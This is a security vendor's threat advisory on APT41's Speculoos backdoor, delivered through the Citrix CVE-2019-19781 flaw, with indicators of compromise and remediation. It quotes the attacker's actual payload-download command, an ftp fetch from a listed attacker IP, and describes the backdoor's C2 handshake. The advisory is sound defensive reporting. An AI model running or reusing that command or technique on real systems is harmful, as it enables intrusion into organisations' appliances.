Rewterz Threat Alert – APT41 Using New Speculoos Backdoor to Target Organizations Globally

Severity

High

Analysis Summary

The global attack campaign by APT41 reported earlier by FireEye seems to be in continuity till date. The threat actors have been targeting Citrix, Cisco, and Zoho network appliances via exploitation of recently disclosed vulnerabilities. The samples of payloads targeting Citrix appliances were executables compiled to run on FreeBSD. Multiple victims have been traced in industries such as healthcare, higher education, manufacturing, government and technology services in multiple regions around the world, such as North America, South America, and Europe. The new backdoor Speculoos is being delivered by exploiting the CVE-2019-19781 Citrix vulnerability. 

Speculoos was delivered by exploiting CVE-2019-19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliances that allowed an adversary to remotely execute arbitrary commands. The vulnerability helps direct the victim appliances to retrieve Speculoos over FTP using the command /usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/<filename> as reported by FireEye. The Speculoos backdoor is an ELF executable compiled with GCC 4.2.1 to run on a FreeBSD system.

Upon execution, the payload enters a loop that calls a function to communicate with the following command and control (C2) domain over TCP/443. If it is unable to communicate with the domain above, Speculoos will attempt to use a backup C2 at 119.28.139[.]20, also over TCP/443. If it is able to connect to either C2 server, it will carry out a TLS handshake with the server using the hardcoded buffer in the binary which is used as the first packet in the handshake. Before sending the hardcoded buffer to the C2 server, Speculoos modifies offset 11 with the current time and offset 15 with 28 pseudorandom bytes generated by iterating through the domain string, adding the current time and then using XOR on each byte with 7 multiplied by the byte’s offset as a key.

Impact

• Remote code execution
• Data exfiltration
• Data manipulation
• Process termination

Indicators of Compromise

Domain Name

• alibaba[.]zzux[.]com
• exchange[.]longmusic[.]com

MD5

• 6edb5def1d82d09bf827d85cb42ab07e
• c33754d068954ec9a61cc9165334a57e

SHA-256

• 99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28
• 6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167

Source IP

• 119[.]28[.]139[.]20
• 119[.]28[.]139[.]120
• 66[.]42[.]98[.]220

Remediation

• Block the threat indicators at their respective controls.
• Keep all Citrix software updated to latest versions.